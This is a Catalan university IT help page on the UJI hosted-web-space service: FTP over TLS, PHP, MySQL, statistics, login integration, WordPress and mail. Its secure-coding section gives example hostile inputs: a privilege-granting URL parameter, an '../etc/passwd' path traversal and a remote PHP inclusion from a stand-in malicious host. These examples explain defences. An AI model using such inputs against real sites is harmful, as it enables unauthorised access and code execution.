Espais cedits


Instruccions

Els departaments, centres, instituts, grups d'investigació i altres entitats vinculades poden sol·licitar espai als servidors centrals de la Universitat per a albergar les seues pàgines web. Podeu consultar els Criteris de cessió d'espais cedits Web i protocols d'actuació davant incidències en els Espais Cedits de l'UJI, i després seguir aquestes instruccions.

Des del Servei d'Informàtica s'ha posat en funcionament un servei de hosting per a albergar els espais cedits corresponents a grups d'investigació, departaments, serveis i altres entitats que necesiten publicar informació en la web amb caracter propi i independent d'aquella informació que apareix al Portal de la UJI.

Introducció

Característiques bàsiques

Els avantatges principals d'usar aquest servei són:

 • Còpia automàtica (backup).
 • Diverses ferramentes a l'abast de tots els espais (sistema de prevenció d'atacs, accés interactiu, base de dades, plantilles, estadístiques, blocs i suport de diverses versions de PHP), llibreries i mòduls d'autentificació d'usuaris de la Universitat Jaume I, certificats per a servidors web segurs, etc. (Existeix la possibilitat de demanar altres ferramentes addicionals a aquestes, i, en cas de ser factible la seua instal·lació, es posarà a l'abast de tots els espais).
 • Opcionalment cada espai cedit pot disposar d'un bloc basat en el programari WordPress.
 • Utilitat per a canviar la clau d'accés de l'usuari ftp. A aquest mateix enllaç hi ha la possibilitat de canvi de contrasenya si no es recorda l'antiga.
 • Opcionalment un espai cedit pot disposar de certificat digital per tal de servir el contingut de forma segura entre l'espai cedit i el visitant. Per tal de sol.licitar aquesta característica haureu de tramitar-ho mijançant un CAU.

Compte FTP i Host Virtual

L'adreça que es facilita a l'espai cedit és un "Host Virtual" dins del domini de la Universitat Jaume I. Per la qual cosa, l'adreça definitiva d'accés a l'espai cedit serà la següent:
- http://<espai_cedit>.uji.es (on espai_cedit pot tindre la sintaxi 'http://www.nom.uji.es' o simplement 'http://nom.uji.es').

Les pàgines web hauran d'ubicar-se al directori "htdocs". L'adreça de connexió al servidor ftp, serà la mateixa que la de l'accés per navegador a l'espai cedit. Normalment:

- ftp://<espai_cedit>.uji.es

 • El nom del servidor  <espai_cedit>.uji.es
 • Port de conexió deixar en blanc
 • El nom d'usuari i la clau d'accés se subministra quan es demana l'espai cedit.
 • Si voleu canviar la clau d'accés subministrada polseu ací.
 • Qualsevol modificació sobre l'espai cedit (crear/eliminar base de dades, canviar Responsable o Persona de contacte, donar/eliminar accessos SSH, etc.) s'ha de comunicar desde el CAU, ho ha de fer el Responsable del site. No s'atendran si vénen de terceres persones.

Per a connectar-se per ftp us recomanem utilitzar el clients com ara FileZilla o WINSCP.

És obligatori que el client d'FTP siga capaç de negociar una connexió segura SSL/TLS (trovareu esta configuració a clients com fileZilla o WinSCP al gestor de llocs amb una descripció pareguda a "Requerix FTP explícit sota TLS").

Execució del programari

Només es permet l'execució d'scripts en PHP (extensions .php, .php5), no es podran executar scripts en perl, python y/o shell script. Ací teniu uns exemples en aquest llenguatge de programació:

PHP ( http://www.php.net )
Quan programeu una aplicació web és molt recomanable seguir aquestes recomanacions. Es tracta de recomanacions per a PHP però són aplicables a qualsevol altre llenguatge de programació:

 • Initzialització de variables:

És imprescindible inicialitzar cada variable que s'utlitze dins de l'script, per tal que no siga inicialitzada per tercers invocant la URL de l'script amb GET o POST. Es a dir, algun podria invocar l'script enviant-li un valor de la variable falç si coneix el nom de la mateixa. Considereu aquest fragment que no inicialitza la variable superusuario:

 • Algú si coneix esta variable podria cridar l'script així http://www..uji.es/example.php?superusuario=true i convertir-se en superusuario. Aquest fragment ja soluciona la fallada de seguretat:

 • Recollida dels valors: 

Les variables que arriben pel mètode GET, POST o COOKIE, normalment són enregistrades com variables globals, de forma que invocant-les directament ja tenim acces al seu valor. Esta és una forma de treballar no recomanable, ja que podem caure una altra vegada en un error similar al d'abans, amb la qual cosa, hauríem de recurrir a altres mètodes per recollir les variables, com ara $_GET['superusuario'] si ens arriba per GET, $_POST['superusuario'] si ens arriba per POST, $_COOKIE['superusuario'] si ens arriba en forma de cookie, o $_REQUEST['superusuario'], que és la forma universal d'accedir, siga quin siga el mètode.

 • Acces a arxius:

Imaginem que tenim una variable $nom_usuari que conté el nom de l'usuari despres d'autenticar-se en algun lloc, i que volem carregar una salutació segons qui siga de la següent forma:

Alguna mala persona podria passar en el $nom_usuari el valor ../../../../etc/passwd o ../../algun/arxiu/secret/important.txt i accedir al contingut amb dades sensibles. Este cas es pot corregir usant la funció realpath($nom_usuari) la qual cosa elimina els .. indeseables. Un altre cas podria ser el del següent script que fa al mateix peró està codificat així:

La mateixa mala persona podria passar-li a l'script com a valor de $nom_usuari una URL amb codi PHP, per exemple:
-
http://www.elmalo.com/codigo_malicioso.php
(http://www..uji.es/example.php nom_usuari=http://www.elmalo.com/codigo_malicioso.php), resultant en que el nostre script inclou el contingut de l'script remot i executant les sentències malignes. La solució passa per utilitzar les funcions realpath() o basename().

 • Altres: 

No useu dades proporcionats per l'usuari, normalment de formularis, com a paràmetres de funcions com eval(), preg_replace() amb l'opció /e, o comandos de sistema com ara exec(), system(), popen(), passthru() o l'operador `, ja que podria acabar executant en el sistema ordres no desitjades.

També és especialment perillos recollir dades proporcionades per l'usuari per a confeccionar una sentència SQL o query. Al repecte haurem d'usar les funcions mysql_real_escape_string(), addslashes() i stripslashes(), per tal d'eliminar caràcters sensibles que podrien facilitar a l'usuri alterar la query.

 • Mes informació:

Llibre "Programming PHP", Editorial O'Reilly, Rasmus Lerdorf & Kevin Tatroe, i una documentació completa de les funcions disponibles en aquest llenguatge de programació, a les següents pàgines web:

Estadístiques setmanals

Tots els espais cedits disposen d'una pàgina on es poden consultar les estadístiques setmanals d'accessos a l'espai cedit. L'adreça d'accés a aquestes estadístiques és la següent:

 • http://<nom_del_espai_cedit>.uji.es/stats/

Aquestes estadístiques ens mostren una relació d'accessos web al nostre espai, amb les següents característiques:

 • Resum d'accesos (nombre de visitants, visites, fulles, sol.licitudsi tràfic). Accesibles per dia, setmana, mes i per any.
 • Detalls de que accedeix (pîum;sos, servidors i robots).
 • Detalls de navegació (duració de visites, fulles d'entrada i d'eixida, tipus d'arxius servits, URLs o fulles accedides, sistemes operatius i navegadors).
 • Enllaços (enllaços externs, des de buscadors i paraules que se busquen en recerques).
 • Altres (afegit a favorits, codis d'error HTTP per fulles no trobades, detalls d'acces des de la xarxa de l'UJI).

Es pot observar que hi ha gran quantitat de paràmetres, encara que en la majoria dels casos només ens interessaran els següents:

 • Nombre de visites: cada visita es correspon en un conjunt d'accesos d'una mateixa persona durant un període de temps (1 hora).
 • Fulles: nombre d'accessos a pàgines HTML.
 • Sol.licituds: fa referència al nombre de hits, on cada hit és un accés a cada element d'una URL o fulla (imatges, elements multimèdia, etc).

Podeu veure un exemple d'aquesta informació accedint a la URL esmentada abans, on podreu trobar ajuda contextual.

També es disposa de l'opció de rebre aquestes estadístiques per correu electrònic. En aquest cas, heu de comunicar-nos-ho fent un comunicat CAU.

Base de dades

Es pot fer ús d'una base de dades Mysql ( http://www.mysql.com ) dins de l'espai cedit. Es pot consultar, inserir, modificar i eliminar la informació emmagatzemada en aquesta base de dades mitjançant qualsevol llenguatge de script d'aquells que hem comentat abans. Un exemple d'accés a la base de dades fet amb PHP podria ser el següent:

Aquest exemple fa una connexió a la base de dades mysql, fa una consulta SQL, i mostra el resultat de la consulta a una taula HTML. Podeu trobar més informació de les funcions d'accés a Bases de Dades Mysql del PHP en aquesta adreça: http://www.php.net/manual/en/ref.mysql.php
Per a gestionar l'estructura i informació d'aquesta Base de Dades, també s'ofereix un entorn visual de gestió de Bases de Dades mysql. La URL d'accés a aquest entorn és la següent:

Per a accedir a la gestió cal autenticar-se amb l'usuari i la clau d'accés del sistema.

Per a fer ús d'aquesta Base de Dades i les seues ferramentes, heu de sol·licitar el servei fent us del CAU.

Autenticació d'usuaris de la Universitat Jaume I

Es posa a disposició de qualsevol espai cedit una llibreria d'autenticació per als usuaris de la Univeristat (només aquells que tinguen compte, no es poden validar comptes locals als espais cedits) que ens permet validar l'accés i mantindre una sessió tant a l'espai cedit com al SSO, permetent ademés que l'usuari autenticat puga accedir a altres eines integrades (pe e-ujier, alavirtual, etc). Per fer ús de la llibreria és precís usar el llenguatge de programació PHP i haver-ho sol.licitat:

 1. En el moment de la sol.licitud d'un nou espai cedit.
 2. Si l'espai ja estava creat, s'ha de fer un CAU sol.licitant esta integració.
 3. Fer ús de HTTPS

Exemple:

Servei de Blog

Aquest programari es basa en el gestor de blocs anomenat WordPress, molt conegut i que us podreu trobar en múltiples llocs. A més, la documentació és molt completa.

L'adreça per accedir a l'administració del vostre bloc és la mateixa que la de l'espai que haveu demanat, afegint al final "/bloc/wp-admin/", per exemple:

 • http://<nom_del_espai_cedit>.uji.es/bloc/wp-admin/

Les credencials que heu d'usar són les mateixes que usareu per accedir via ftp. Per tal de vore les entrades de la nostra bitàcola simplement afegim "/bloc/" al final de l'adreça del nostre espai. Per exemple:

 • http://<nom_del_espai_cedit>.uji.es/bloc

Enviament de correu

L'enviament de correu a través del servidor de correu que tenim habilitat en la màquina d'espais cedits s'ha de fer de manera autenticada per evitar riscos de propagació de virus i spam davant d'un accés no autoritzat a un dels comptes dels espais cedits. El següent codi font exposa una funció d'exemple per tal d'enviar correu autenticat (usant les credencials de l'usuari de l'espai cedit):


2. Es pot utilitzar qualsevol eina més completa d'enviament de correu. Posem a la vostra disposició diversos enllaços a les eines de gestió de continguts que solen ser més utilitzades.

 • WordPress

  Si has instal·lat la teua la versió de WordPress necessitaràs instal·lar el següent plugin polsant en aquest enllaç, WP Mail SMTP: wordpress.org/extend/plugins/wp-mail-smtp
 • Configuració per a enviar correus utilitzant WP Mail SMTP

En l'opció "Ajustes", seleccionar "Email". A continuació cal configurar les dades del servidor SMTP que necessitem utilitzar. Per a poder realitzar enviaments de correus des del WordPress utilitzant el SMTP de la Universitat Jaume I hauràs d'indicar les següents dades de configuració del servidor.

Altres

En aquesta secció, s'anirà afegint progressivament altres eines d'ús relacionada amb la cessió d'espais:

 • Utilitat per al processament i enviament de formularis per correu (consulte la documentació).
 • Utilitat per a canviar la clau d'accés de l'usuari ftp
 • Utilitat per a generar gràfiques (de barres, tartas, etc) en PHP anomenada JPGRAPH.

Per a fer ús d'aquesta eina, en els vostres scripts PHP ha d'incloure la línia:

 • include ("jpgraph14 / jpgraph.php");

al principi del script.

Si desitja saber més sobre aquesta eina visite http://www.aditus.nu/jpgraphh